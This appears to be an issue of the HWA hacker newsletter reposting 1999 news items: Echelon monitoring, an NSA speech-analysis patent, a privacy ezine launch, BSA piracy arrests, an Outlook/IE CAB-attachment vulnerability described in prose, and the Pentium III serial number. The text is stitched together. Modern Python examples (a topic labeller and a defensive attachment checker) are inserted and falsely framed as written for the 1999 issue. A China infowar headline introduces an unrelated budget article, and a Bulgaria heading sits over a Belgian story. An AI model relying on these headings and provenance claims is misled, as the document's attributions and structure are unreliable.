@HWA 21.0 ACLU to Monitor Echelon ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by turtlex The American Civil Liberties Union in cooperation with the Electronic Privacy Information Center and others has started a program to monitor Echelon. The groups hope to pressure congress for an investigation into the global eavesdropping network. (For something that supposedly doesn't exist - Echelon sure gets a lot of press.) Wired http://www.wired.com/news/politics/0,1283,32586,00.html ACLU http://www.aclu.org EPIC http://www.epic.org Echelon Watch http://www.echelonwatch.org Wired; ACLU to Spy on Echelon by Chris Oakes 3:00 a.m. 17.Nov.1999 PST The American Civil Liberties Union has focused its eye on an international electronic surveillance system that allegedly eyeballs regular citizens. The civil liberties watchdog launched Echelon Watch, a site designed to prompt governmental investigation into the reality -- and the legalities -- of a global electronic surveillance system said to be code-named "Echelon." "This has gone from X Files material to clear reality," said ACLU associate director Barry Steinhardt. "I think at this point it's fact that it exists." The ACLU created and administers the site in conjunction with the Electronic Privacy Information Center and the Omega Foundation of Great Britain, which prepared a report on the issue to the European Parliament. No US intelligence agency has confirmed Echelon, but Steinhardt believes there is sufficient evidence to require a congressional investigation. "I admit that we do not know all the details," Steinhardt said. "But based on these credible reports, it is plainly very large, and very sophisticated." The ACLU bases its position mainly on two reports commissioned by the European Parliament and a letter written by an Australian intelligence official, which confirmed aspects of an Echelon-like operation involving the United Kingdom, the United States, and Australia. 
According to reports such as those solicited by the European Parliament, Echelon is led by the National Security Agency in the United States, in conjunction with its counterpart agencies in England, Canada, Australia, and New Zealand. Such reports paint a picture of an internationally coordinated surveillance system that intercepts and analyzes global land-based and space-based communications networks, such as the Internet. Monitoring operations run by intelligence agencies worldwide are said to catch everyday telephone, data, cellular, fax, and email transmissions. The transmissions are then purportedly analyzed for suspect activity -- such as terrorism -- and handed off to the appropriate government. -> *By coordinating across national boundaries, governments can monitor each -> *other's traffic and circumvent laws prohibiting governments from spying on -> *their own citizens. Echelon reportedly attempts to capture satellite, microwave, cellular, and fiber-optic communications. The latest in a trickle of what are often merely suggestions of Echelon-like operations is a patent issued by the US Patent and Trademark Office to the US National Security Agency in August for voice-recognition technology. Steinhardt pointed out that the technology is designed to summarize voice communications for further examination. Such technology sounds Echelon-ish -- but then again, it was issued to an intelligence-gathering agency. That's partly why the ACLU wants to see the issue taken beyond disparate reports, theories, and rumors. "Echelon operates inside this black box -- without judicial supervision, without public notice," Steinhardt said. "At this point what the ACLU is asking for is full disclosure of the laws under which Echelon operates -- something the NSA has refused to provide, even to Congress." The report to the European Parliament said that the United Kingdom used the Echelon system to spy on charities, including Amnesty International and Christian Aid. 
The United States has never officially acknowledged Echelon's existence. When approached to discuss Echelon-related developments, the National Security Agency repeatedly declines comment. Representative Bob Barr (R-Georgia) earlier this year amended intelligence legislation in the House of Representatives to require US intelligence agencies to report on legal standards used in surveillance activities. The legislation -- which targets the National Security Agency, the Central Intelligence Agency, and the Department of Justice -- remains in a House-Senate conference committee awaiting action. Barr is a former CIA official and US attorney who serves on the House Judiciary and Government Reform committees. He has accused the NSA of conducting a "dragnet" of communication and "invading the privacy of American citizens." Documents posted at Echelon Watch include the fax image of a letter sent to an Australian journalist from the Office of the Director of the Australian Defence Signals Directorate (DSD), Martin Brady. The operating rules of the Australian agency "do provide mechanisms to permit DSD to monitor and report foreign communications involving Australians in some special carefully-defined circumstances," the letter said. "DSD does cooperate with counterpart signals intelligence organizations overseas under the UK-USA relationship." In addition to a collection of such documents related to Echelon, the new ACLU site will leverage the group's existing site traffic to encourage public discussion of Echelon's impact on civil liberties. It features links prompting visitors to urge an investigation to Congress. "I think it's beginning to be taken seriously in Washington," Steinhardt said. "It's certainly being taken seriously in other parts of the world. I think the hearings will be the likely next step." 
@HWA 22.0 NSA Gets Patent on Analyzing Speech ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond The National Security Agency has recently been awarded a patent for a system of automatic topic spotting and labeling of data. This could assist the agency in automatically analyzing human speech. The London Independent http://www.independent.co.uk/news/Digital/Features/spies151199.shtml US PTO http://164.195.100.11/netacgi/nph-Parser?Sect1=PTO1&Sect2=HITOFF&d=PALL&p=1&u=/netahtml/srchnum.htm&r=1&f=G&l=50&s1='5,937,422'.WKU.&OS=PN/5,937,422&RS=PN/5,937,422 London Independent; This is just between us (and the spies) The US National Security Agency has patented a new technology for monitoring millions of telephone calls, so watch out, it's now even easier for the spooks to eavesdrop on your conversations By Suelette Dreyfus 15 November 1999 The US National Security Agency has designed and patented a new technology that could aid it in spying on international telephone calls. The NSA patent, granted on 10 August, is for a system of automatic topic spotting and labelling of data. The patent officially confirms for the first time that the NSA has been working on ways of automatically analysing human speech. The NSA's invention is intended automatically to sift through human speech transcripts in any language. The patent document specifically mentions "machine-transcribed speech" as a potential source. Bruce Schneier, author of Applied Cryptography, a textbook on the science of keeping information secret, believes the NSA currently has the ability to use computers to transcribe voice conversations. "One of the holy grails of the NSA is the ability automatically to search through voice traffic. They would have expended considerable effort on this capability, and this indicates it has been fruitful," he said.
To date, it has been widely believed that while the NSA has the capability to conduct fully automated, mass electronic eavesdropping on e-mail, faxes and other written communications, it cannot do so on telephone calls. While cautioning that it was difficult to tell how well the ideas in the patent worked in practice, Schneier said the technology could have far-reaching effects on the privacy of international phone calls. "If it works well, the technology makes it possible for the NSA to harvest millions of telephone calls, looking for certain types of conversations," he said. "It's easy to eavesdrop on any single phone call, but sifting through millions of phone calls looking for a particular conversation is difficult," Schneier explained. "In terms of automatic surveillance, text is easier to search than speech. This patent brings the surveillance of speech closer to that of text." The NSA declined to comment on the patent. As a general policy, the agency never comments on its intelligence activities. Yaman Akdeniz, director of Cyber-Rights & Cyber-Liberties UK, warned that with the new patent and a proposed AT&T and BT joint venture, which will allow US law enforcement agencies to tap the new communications network: "We might have a picture in which all British communications are monitored by the NSA." The revelation of the NSA's patent is likely to cause tensions with the European Parliament. Over the past two years, the Parliament has commissioned several reports which examined whether the NSA has been using its electronic ears for commercial espionage, particularly in areas where US corporations compete with European and other companies. The NSA relies on an international web of eavesdropping stations around the world, commonly known as Echelon, to listen into private international communications. The network emerged from a secret agreement signed after the Second World War between five nations including Australia, New Zealand, Canada, Britain and the US. 
Two of the NSA's most important satellite listening stations are located in Europe, at Menwith Hill in Yorkshire and Bad Aibling in Germany. Julian Assange, a cryptographer who moderates the online Australian discussion forum AUCRYPTO, found the new patent while investigating NSA capabilities. "This patent should worry people. Everyone's overseas phone calls are or may soon be tapped, transcribed and archived in the bowels of an unaccountable foreign spy agency," he said. One of the major barriers to using computers automatically to sift through voice communications on a large scale has been the inability of machines to "think" like humans when analysing the often imperfect computer transcriptions of voice conversations. Commercial software that enables computers to transcribe spoken words into typed text is already on the market, but it usually requires the machine to spend time learning how to understand an individual voice in order to produce relatively error-free text. This makes such software impractical for a spy agency which might want automatically to transcribe and analyse telephone calls on a large scale. It is also difficult for computers to analyse voice conversations because human speech often covers topics that are never actually spoken by name. According to the NSA patent application, "much of the information conveyed in speech is never actually spoken and... utterances are frequently less coherent than written language". US Patent number 5,937,422 reveals that the NSA has designed technology to overcome these barriers in two key ways. First, the patent includes an optional pre-processing step which cleans up text, much of which the agency appears to expect to draw from human conversations. The NSA's "pre-processing" will remove what it calls "stutter phrases" associated with speech based on text. Second, the patent uses a method by which a computer automatically assigns a label, or topic description, to raw data. 
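A toy version of the two steps the article just described (clean up a machine transcript, then attach a topic label), added here as an illustration and not taken from the patent or from the Independent: the filler list, the repeat collapsing and the keyword-overlap scoring are simple stand-ins that show the shape of the pipeline, and the transcript and topic table are constructed. The point it makes concrete is Schneier's remark above: once speech is text, searching it is a cheap text-processing problem.

```python
"""Toy pipeline: clean a speech transcript, then label its topic.

Added example, not the NSA patent's method. The filler list, the
stutter collapsing and the keyword-overlap scoring are simple
stand-ins; the transcript and topic table below are constructed.
"""
import re
from collections import Counter

# Disfluencies that carry no topical information ("stutter phrases").
FILLERS = {"um", "uh", "er", "ah", "hmm"}

# Constructed topic table: label -> words that signal the topic.
TOPICS = {
    "banking": {"account", "balance", "deposit", "withdraw", "bank", "wire"},
    "travel": {"flight", "airport", "ticket", "hotel", "departure"},
    "health": {"doctor", "appointment", "prescription", "clinic"},
}


def clean_transcript(text):
    """Lower-case, drop filler words and collapse immediate repeats ("I I I need")."""
    tokens = re.findall(r"[a-z']+", text.lower())
    cleaned = []
    for tok in tokens:
        if tok in FILLERS:
            continue
        if cleaned and cleaned[-1] == tok:
            continue  # stutter: the same word repeated back to back
        cleaned.append(tok)
    return cleaned


def label_topic(tokens, topics=TOPICS):
    """Return (label, scores). The label is the topic whose vocabulary covers
    the largest share of the tokens, or "unlabelled" when no topic word appears."""
    counts = Counter(tokens)
    total = max(len(tokens), 1)
    scores = {label: sum(counts[w] for w in vocab) / total
              for label, vocab in topics.items()}
    best = max(scores, key=scores.get)
    return (best if scores[best] > 0 else "unlabelled"), scores


# Constructed transcript with the kind of disfluencies a transcriber leaves in.
SAMPLE_TRANSCRIPT = ("um so I I I need to uh check the the balance on my account "
                     "and and maybe make a deposit")

if __name__ == "__main__":
    tokens = clean_transcript(SAMPLE_TRANSCRIPT)
    print(" ".join(tokens))
    print(label_topic(tokens))
```

The cleaning step is what turns a noisy transcript into something a plain text classifier can use; the labelling step is deliberately naive (a share-of-tokens score over a hand-written vocabulary), which is enough to show why the article treats "text is easier to search than speech" as the crux.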
If the method works well, this system could be far more powerful than traditional keyword searching used on many Internet search engines because it could pull up documents based on their meaning, not just their keywords. Dr Brian Gladman, former MoD director of Strategic Electronic Communications, said that while he doubted the NSA had deployed the patented system yet, the new technology could become a "potent future threat" to privacy. "If the technology does what it says -- automatically finding and extracting the meaning in messages with reasonable accuracy -- then it is way ahead of what is being done now," he said. The best way for people to protect their private communications was to use encryption, he said. Encryption software programs scramble data to prevent eavesdropping. "I'm afraid widespread interception is a fact of life and this is what makes encryption so important," he said. "The problem in the UK is that our government is working with the US to prevent UK citizens defending themselves using encryption," he said, referring to the continuing use of export controls to hamper the widespread availability of encryption products. The NSA's current spy technology may be more advanced than methods described in the patent because the application is more than two years old. The US Patent Office approved the patent on 10 August this year, but the NSA originally lodged the application on 15 April 1997. The US Patent office keeps all applications secret until it issues a patent. @HWA 23.0 New Ezine and Web Site - PrivacyPlace Launches ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by Weld Pond An online magazine, with news about privacy issues updated on a daily basis, PrivacyPlace includes opinions, advice, a forum for readers, an archive of articles on privacy, and a marketplace that recommends products and services available for protecting privacy.
Future content includes product and book reviews, a developer's corner, and guides to encrypting e-mail and surfing the web anonymously. PrivacyPlace http://www.privacyplace.com Excite News http://news.excite.com/news/bw/991112/ca-lumeria 'PrivacyPlace,' the Online Magazine for Personal Privacy, Launches First Issue; PrivacyPlace.com Offers News, Opinion, Advice, Community and Technology for Protecting Personal Privacy Updated 6:03 AM ET November 12, 1999 BERKELEY, Calif. (BUSINESS WIRE) - PrivacyPlace, a new site designed to offer individuals ways to protect their personal privacy, is now online at www.privacyplace.com. An online magazine, with news about privacy issues updated on a daily basis, PrivacyPlace includes opinions, advice, a forum for readers, an archive of articles on privacy, and a marketplace that recommends products and services available for protecting privacy. Future content includes product and book reviews, a developer's corner, and guides to encrypting e-mail and surfing the web anonymously. PrivacyPlace.com is an effort to give people the tools, the information, and ideas on ways to protect their privacy. PrivacyPlace Editor Tom Maddox is a science fiction writer, screenplay writer (he has written two X Files scripts with coauthor William Gibson), journalist, and essayist. Maddox says PrivacyPlace aims to combine the creativity of a talented team of writers with the power of the Internet to create a publication that is lively, funny, insightful, and ultimately useful for anyone concerned with personal privacy. His credo: "We believe in the power of each of us to fight in our own lives for our privacy and in the social power of concerted action." Regular columnists for PrivacyPlace include Mike Godwin, former legal counsel for the Electronic Frontier Foundation, and Jacques Francoeur, CEO of The Privacy Gateway and expert in international privacy issues. 
In the first issue, special contributor George Smith, editor of Crypt News and longtime debunker of government myths about cryptography, writes about the Moonlight Maze -- the Russian infowar attack that never was. A regular feature includes the Nosy Parker Award, which is presented to those who have egregiously trampled on personal privacy, and a regular column from an anonymous character known as Paranoid Paul, who issues a report from the road. The Marketplace offers privacy-related software programs users can purchase for immediate download. There's also an ever-growing library of past articles on privacy, indexed by subject, and a Forum, where readers can talk with each other, with writers at PrivacyPlace, and with the editors. PrivacyPlace is owned and operated by Lumeria Inc, an infomediary incubator. Lumeria was founded in 1997 by former computer journalist and industry analyst Fred Davis to provide technology solutions for the personal management of information and knowledge. Fred Davis is also the Editor-in-Chief of PrivacyPlace. The publisher of PrivacyPlace is Colette McMullen, who also serves as Lumeria's VP of Sales and Marketing. Before joining Lumeria, McMullen was Group Publisher of IDG's Web Publishing group -- which includes Sun World, Java World, and Linux World -- where she cofounded the first profitable online publication. Contact: PrivacyPlace Tom Maddox, 510/981-2215 editor@privacyplace.com or Berkeley Ventures, Inc. Sylvia Paull, 510/526-5555 sylvia@weblust.com 24.0 Vendor Response Archive ~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by erik Dragonmount Networks, in hoping to expose vendors who put security on the back burner, and to salute those who make it a priority, has launched the Vendor Response Archive. The Vendor Response Archive hopes to pressure software vendors to take security seriously. If a vendor responds poorly to a problem, users should know. 
Likewise, if a vendor responds quickly and honestly, the vendor should be commended. Dragonmount Networks http://www.dragonmount.net/security/vra/index.htm @HWA 25.0 Another from Cuartango: More Microsoft Security Holes ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ From HNN http://www.hackernews.com/ contributed by no0ne Called the "Active Server Setup Security Loophole", this glitch in Microsoft Outlook and Outlook Express can download an e-mail attachment without the users knowledge. The attachment has the capability to access and delete files at will. MSNBC http://www.msnbc.com/news/335418.asp MS bug opens door to your hard drive Outlook, Outlook Express save temporary copy of file to disk when you open attachment By Bradley F. Shimmin BUGNET Nov. 15 — Forget for now about the BubbleBoy Virus, which has yet to cause anyone harm. There’s a real vulnerability lurking in Microsoft Outlook and Outlook Express capable of delivering your machine into malevolent hands. DISCOVERED BY JUAN CARLOS GARCIA CUARTANGO, the “Active Setup Control Security Loophole” can download and save an e-mail-borne attachment without your intervention or knowledge. Once free to roam your hard drive, the attachment can access or delete files at will. (Note: Microsoft is a partner in MSNBC.) What makes this vulnerability particularly scary is its stealth. A hostile hacker could create an HTML e-mail message attachment that masquerades as an innocuous Cabinet (CAB) file. This is the file format Microsoft uses to transport and store application code such as software updates. The trick is that you don’t need to save such a deceitful file to disk. By simply opening the attachment, both e-mail applications save a temporary copy to disk. Code embedded in the e-mail message can then execute this copy. 
“A malicious user could embed an unsafe executable and disguise it as a safe attachment, so users following normal security standards could think they are safe,” explained Lisa Gurry, a Microsoft product manager for Office. “The danger is someone could exploit it and create a CAB that could do who knows what.” Concerned users can quickly disable Active Scripting in Outlook 2000 or Outlook Express as a temporary workaround. This will prevent any embedded code from executing a malicious CAB file that has already been written to disk. Another workaround is to simply save attachments to disk before opening them. The unfriendly code in an e-mail message must execute when the file attachment is opened in order to find out where the temporary file has been created. To fully quash this bug, Microsoft recommends a software patch, which the company has made available from its Security Advisor site. But it’s not for Outlook or Outlook Express. “The vulnerability is in Internet Explorer,” said Gurry. “It is an ActiveX control that ships as a part of Explorer 4 and 5, yet Outlook and Outlook Express users are affected by it.” Microsoft's Active Setup Control Patch The patch fixes a fault within the Active Setup ActiveX control found within IE version 4.01 and above running on both Intel and Alpha machines. It replaces a file called INSENG.DLL with a file of the same name dated 10/26/1999. The new file requires that all CAB file attachments (real or pretend) contain a valid digital signature. Of course, a knave could still send a hostile attachment, but the file’s signature would create a traceable fingerprint. However, the patch only works on versions 4.01 running Service Pack 2. If you’re running IE 4.01 with Service Pack 1 (or any earlier version of IE), Microsoft recommends that you simply upgrade to a newer version before applying the patch.
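The article describes the attack as two pieces working together: a part labelled as a Cabinet file that is really something else, and script in the HTML message that runs the temporary copy. Besides the client-side workarounds above (disable Active Scripting, save attachments before opening, apply the INSENG.DLL patch), a mail gateway can flag messages that show both pieces. The check below is an added example written for this issue, not code from MSNBC, Cuartango or Microsoft; it assumes only Python's standard `email` package, the registered `application/vnd.ms-cab-compressed` MIME type and the fact that every genuine CAB archive starts with the bytes `MSCF`. The two messages it builds are constructed samples.

```python
"""Mail-gateway style check for the attachment trick described above.

Added example, not code from the HWA issue or from Microsoft. It looks
for the two halves of the described attack: an HTML body carrying
active content, and an attachment labelled as a Cabinet (.cab) file
whose bytes are not a CAB container. The MIME type and the "MSCF"
header are real; the messages built below are constructed samples.
"""
import email
import re
from email import policy
from email.message import EmailMessage

# Every genuine Microsoft Cabinet archive begins with this four-byte signature.
CAB_MAGIC = b"MSCF"

# HTML tags able to carry code that a mail client might run when rendering.
ACTIVE_CONTENT = re.compile(r"<\s*(script|object|embed|applet)\b", re.IGNORECASE)


def attachment_findings(raw_message):
    """Return a list of findings (empty when nothing looks wrong) for one message."""
    msg = email.message_from_bytes(raw_message, policy=policy.default)
    findings = []
    for part in msg.walk():
        if part.is_multipart():
            continue
        ctype = part.get_content_type()
        filename = part.get_filename() or ""
        payload = part.get_payload(decode=True) or b""
        # Half one: script or similar in the HTML body.
        if ctype == "text/html" and ACTIVE_CONTENT.search(payload.decode("utf-8", "replace")):
            findings.append("html body contains active content")
        # Half two: something presented as a CAB file that is not one.
        claims_cab = (filename.lower().endswith(".cab")
                      or ctype == "application/vnd.ms-cab-compressed")
        if claims_cab and not payload.startswith(CAB_MAGIC):
            findings.append("attachment %r is labelled as a CAB file but is not a CAB archive"
                            % filename)
    return findings


def build_suspicious_sample():
    """Constructed sample: HTML body with a script tag plus a fake .cab attachment."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "constructed sample"
    msg.set_content("plain text fallback")
    msg.add_alternative("<html><body><script>/* constructed */</script></body></html>",
                        subtype="html")
    # Named and typed as a Cabinet file, but the bytes are HTML.
    msg.add_attachment(b"<html><body>not a cabinet</body></html>",
                       maintype="application", subtype="vnd.ms-cab-compressed",
                       filename="update.cab")
    return bytes(msg)


def build_clean_sample():
    """Constructed sample: plain body plus an attachment that really is a CAB container."""
    msg = EmailMessage()
    msg["From"] = "sender@example.invalid"
    msg["To"] = "recipient@example.invalid"
    msg["Subject"] = "constructed clean sample"
    msg.set_content("plain text only")
    msg.add_attachment(CAB_MAGIC + b"\x00" * 32,
                       maintype="application", subtype="vnd.ms-cab-compressed",
                       filename="real.cab")
    return bytes(msg)


if __name__ == "__main__":
    for finding in attachment_findings(build_suspicious_sample()):
        print("FLAG:", finding)
    print("clean sample findings:", attachment_findings(build_clean_sample()))
```

A magic-byte check of this kind only catches the "pretend" CAB files the article mentions; a real CAB carrying hostile code passes it, which is why Microsoft's patch moved the decision to a digital signature on the archive rather than its format.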
@HWA

26.0 DOD helps Local Cops in Fighting CyberCrime
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Weld Pond

While the Department of Defense may be prohibited from conducting local law enforcement, it can advise or assist local police agencies in other ways, such as grants, access to support services or systems, and transfers of equipment or other assets. The GAO has released a report detailing crime technology assistance from DOD to local law enforcement agencies.

GAO
http://www.gao.gov/daybook/991115.htm
(Links to pdf files)

@HWA

27.0 BSA Busts IRC Pirates
     ~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by Evil Wench

US Marshals have reportedly seized five computers and have executed several search warrants in Sacramento and Downey, California, and Troy and West Bloomfield, Michigan. The people arrested have been accused of using the IRC channel 'warez4cable' to trade copyrighted software. The accused individuals could face up to US$100,000 in fines for copyright infringement. BSA claimed that the IRC channel has been shut down (seems open right now, just +i) and that this case has had a dramatic impact on online piracy. (Dramatic impact? One channel out of thousands? Yeah, OK, sure.)

Wired
http://www.wired.com/news/technology/0,1282,32616,00.html

Warez Chatters Busted: Piracy
by Wired News Report
3:45 p.m. 17.Nov.1999 PST

The Business Software Alliance is pressing charges against 25 people the organization accuses of trafficking pirated software on the Internet.

US Marshals reportedly seized five computers and performed unannounced searches in the homes of several of those accused of the pirating, including residents of Sacramento and Downey, California, and Troy and West Bloomfield, Michigan. The accused individuals could face up to US$100,000 in fines for copyright infringement, the BSA said.
The individuals were allegedly using a channel on Internet Relay Chat, a real-time chat network commonly used by hackers and crackers to communicate and plan their activities. The channel, called warez4cable, has been shut down, according to the BSA, as well as several other warez channels. Warez refers to software that has been stripped of its copy-protection and made available on the Internet for downloading.

The BSA said in a statement that the action against the warez users is part of an initiative to "shut down illegal trafficking of software on the Internet."

"We have seen an immediate impact on piracy in IRC channels as a result of the lawsuit," BSA enforcement official Bob Kruger said. "BSA will continue to fight piracy on the Internet to keep it a safe place for those who are engaging in legitimate commerce."

@HWA

28.0 US Concerned About Chinese Statements
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

From HNN http://www.hackernews.com/

contributed by William Knowles

Recent posturing by the Chinese government about information warfare has the US worried. The People's Liberation Army has announced that it will gear up its information warfare capabilities to rival those of its land, sea and air forces. Vice Adm. Thomas Wilson, the new director of the Defense Intelligence Agency (DIA), has called the Chinese plans and their open discussion of them unsettling. (Let the arms race begin.)

Washington Times
http://www.washingtontimes.com/news/news3.html

House OKs budget of $384 billion for '00

By Dave Boyer
THE WASHINGTON TIMES

The 106th Congress is wrapping up its first session with Republican lawmakers trumpeting admittedly modest spending achievements and Democrats bemoaning lost opportunities for new regulations.

The House Thursday passed, 296-135, the final $384 billion spending bill for fiscal 2000, while the Senate cleared the way for a vote Friday.
The measure calls for a 0.38 percent across-the-board cut -- not including congressional salaries and government entitlements.

House Speaker J. Dennis Hastert of Illinois, who worked until 3:30 a.m. Thursday to complete the budget, said Republicans can be proud of balancing the budget, saving Social Security funds, increasing spending for education and defense and passing a tax cut that President Clinton vetoed.

"We did all of the things we set out to do," Mr. Hastert said. "We've done the things that the American people wanted us to do."

House Minority Leader Richard A. Gephardt of Missouri said Congress accomplished little of importance. Mr. Gephardt expressed disappointment that Congress did not ban "soft money" in political campaigns, failed to pass gun regulations or a minimum-wage increase, and did not enact a new benefit for prescription drugs. (Soft money is unlimited and largely unregulated donations.)

"We're leaving here without doing the things that people most wanted us to do," Mr. Gephardt said.

Looking back, Democrats are happy about one thing that Congress didn't do -- remove Mr. Clinton from office after his impeachment last December. His trial in the Senate ended Feb. 12 without the necessary two-thirds vote to oust him.

Asked what he thought was Congress' single-biggest achievement this year, Senate Minority Leader Tom Daschle said, "In a strange sort of way, I think it's probably the successful handling of the impeachment process. There was so much riding on it."

While Congress may have put the impeachment behind it, there is still a healthy dislike for the Clintons in evidence. Just Thursday the House deleted from the budget a White House request, championed by first lady Hillary Rodham Clinton, for $3 million for a music museum in New York, where she is contemplating a run for the Senate.

Mr. Daschle said the Senate's defeat of the Comprehensive Test Ban Treaty was the worst moment of the session, calling it "an embarrassment to the country." Republicans consider the vote important, saying the treaty would have weakened the nation's defenses by throwing into doubt the reliability of the U.S. nuclear stockpile.

From a fiscal perspective, Republicans ducked the reality that they are spending about 5 percent more in fiscal 2000 than last year. They chose instead to focus on victories within the overall budget, such as protecting Social Security funds from being used for the general budget.

At a rally of House Republicans Thursday night after the vote, Rep. Jennifer Dunn of Washington said the Social Security issue will resonate with women. "Women live longer than men, and yet they retire on fewer dollars," Mrs. Dunn said. "The security in their lives will be there when they get to retirement age."

Almost by accident, Republicans hit on a popular feature this year that may become part of future budgets -- across-the-board cuts aimed ostensibly at eliminating government waste and fraud. The idea was proposed earlier this year by Rep. John R. Kasich, Ohio Republican and chairman of the House Budget Committee, but was largely ignored until late in budget negotiations when the GOP needed to save several billion dollars to balance the budget. Mr. Clinton and congressional Democrats fought a 1 percent cut but relented at 0.38 percent, and Republicans are finding that constituents like the idea.

"It's very reasonable, it's fair and it's an effective management tool," said Rep. Asa Hutchinson, Arkansas Republican. "We'll come back and try it again next year."

Defense spending was a big reason for the overall budget increase. After years of defense cuts under Mr. Clinton, Congress this year appropriated $268 billion for the military -- about $17 billion more than last year and more than Mr. Clinton requested.
"This year, we Republicans can be very proud that we took a critical first step towards addressing the needs of our long-ignored defense structure," said Rep. Tillie Fowler, Florida Republican and a member of the Armed Services Committee.

House Majority Leader Dick Armey, Texas Republican, said that in addition to increasing defense spending and reducing the national debt by $130 billion, the Republican-led Congress thwarted Mr. Clinton's proposals for more than 70 different tax increases.

"All of those I think are reasons for us to be very pleased with a good year's work," Mr. Armey told reporters.

With only a five-vote majority in the House, Republicans said they had little choice this year but to compromise with the administration on a variety of issues. Although overall spending increased significantly, the GOP said it was victorious in curtailing Mr. Clinton's budget priorities much more than last year.

Said Sen. Paul Coverdell of Georgia, secretary of the Senate Republican Conference, "The wonder to me is, given the limited beachhead -- we've never had what you'd call a decisive majority in the House, an organizational majority but not a governing majority in the Senate, we don't have the presidency -- the wonder is we've come so far."

Although Republican lawmakers did give in to Mr. Clinton's request to pay about $1 billion in U.N. dues, they won a provision for which they had been fighting since 1994 -- restricting foreign aid from being used for family planning services overseas.

"This seems to a lot of people like a small thing . . . but for five years we tried to win on that issue, and this year we by and large got Ronald Reagan's policy back into the law," Mr. Armey said.

On education, although Republicans acquiesced to Mr. Clinton's demand to continue funding his program to hire 100,000 teachers, the GOP won concessions from the White House to funnel some of the money for teacher certification.
The Senate in October passed, for the third time in four years, a ban on "partial birth" abortions, but again failed to achieve enough votes to override Mr. Clinton's certain veto. The House has yet to take up the issue.

@HWA

29.0 The state of the net in Bulgaria
     ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Contributed by Zym0t1c

BRUSSELS | Nov 19 1999 - A hacker called g-RaX defaced both websites of our Belgian State Council and our Treasury... g-RaX left some small notes referring to our phone company (Belgacom), probably because of the high internet prices, and to the famous Belgian writer Herman Brusselmans, who has been charged because he sort of insulted An Demeulemeester, a (great) Belgian fashion designer, in his latest book. Screw them! I love his books... The point is that the State Council is not impressed by this burglary... Both websites were hosted on stand-alone computers which weren't connected at all with their internal network, so g-RaX posed no threat... However, the State Council is pressing charges against g-RaX.

Belgian State Council: http://www.raadvst-consetat.be/
Belgian Treasury: http://treasury.fgov.be/

(Neither site was defaced at the time I received this email - Ed)

@HWA

30.0 More on the PIII chip ID
     ~~~~~~~~~~~~~~~~~~~~~~~~

http://www.heise.de/ct/english/99/05/news1/

Christian Persson

Pentium III serial number is soft switchable after all
Intel's privacy strategy changed again

The controversial serial number of the new Pentium III processors can be read on the quiet after all. Contrary to Intel's description so far, the system architecture allows for individual identification by software tricks without a user's explicit permission or notice.

Intel's new technique for securing E-Commerce transactions already caused quite a stir as the Pentium III presentations approached. Privacy advocates expected the readable serial number to act as a "permanent cookie" and to produce the completely transparent surfer.
The processor manufacturer appeased with the guarantee that the user would have full control over whether to allow the read-out of the serial number. Once switched off, the corresponding processor command could not be activated until the next cold start.

This description has proved wrong. The processor expert of c't magazine, Andreas Stiller, has figured out a procedure to switch on the command for reading out the serial number by software. This procedure is based on specific features of the system architecture that are documented. They would have got around in cracker circles sooner or later. A spokesperson from Intel confirmed upon inquiry by c't, that the serial number can be re-activated this way.

Intel's solution is a renewed correction of its announcements of how privacy could be guaranteed in spite of the serial number: whereas only a software tool for switching the serial number on and off was intended so far, now the PC manufacturers are encouraged to integrate the configuration of the switching into the BIOS. This way, switching on by software could be prevented. Earlier Intel had rejected this method with the argument that changes in the BIOS setup could not be expected from untrained users.

Intel said that the BIOS manufacturers had been informed correspondingly. Also, they had been equipped with software samples. It remains to be seen how many manufacturers will be able to incorporate appropriate BIOS functions into the first delivered Pentium III systems and how they are configured by default. To top it all, the new privacy concept has holes, too: after all, the BIOS setting has to be stored in the CMOS memory. Someone who knows the respective BIOS very well can crack this, too. (as)

Addendum

The wording "A spokesperson from Intel confirmed upon inquiry by c't, that the serial number can be re-activated this way" in the above text has been taken as an acknowledgement that the software developed by c't has been checked by Intel. This is not the case.
Actually, the spokesperson made a statement about the procedure that c't described to an Intel specialist.

-=-

Software claims to undo Pentium III fix
By Michael Kanellos and Stephanie Miles
Staff Writers, CNET News.com
March 10, 1999, 6:30 p.m. PT

Canadian software developers say they have created a program that can obtain the Pentium III processor serial number despite the privacy protection measures taken recently by Intel.

Zero Knowledge Systems of Montreal said today that it has developed an ActiveX control that can retrieve the serial number under certain circumstances, even after a software repair released last month by Intel has disabled the feature and ostensibly "hid" the number from prying eyes.

The Pentium III serial number has turned into a public-relations nightmare for the world's largest chipmaker. Although Intel included the number in the chip as a way to improve Internet security, it has drawn protests from privacy advocates who say it provides hackers with an opportunity to obtain sensitive information.

Zero Knowledge's control essentially exploits the approximately 15-second gap between the time a Pentium III computer is turned on and exposes the processor serial number and when the software repair kicks in and covers it up. The control tricks the computer into crashing. Then, as the machine is rebooted, Zero's software grabs the number before the software utility has a chance to disable it again.

"It simulates a crash and could be attached to a virus, hidden inside an email attachment, shareware--anyway that people get hostile code onto your machine," Zero Knowledge president Austin Hill said.

The ActiveX control grabs the serial code upon reboot, Hill said, and places it in a cookie file that can be read by Web sites.

The Pentium III includes a serial code hardwired into the chip, along with incremental improvements in speed and multimedia instructions.
Privacy and consumer rights groups are up in arms over the new feature, which they say can provide an easy way for unscrupulous marketers and hackers to track users based on their surfing habits. Some groups have called for a boycott of Intel, while others, including the Center for Democracy and Technology, the ACLU, and the Electronic Privacy Information Center, are meeting with the FTC to pursue an investigation into the serial code.

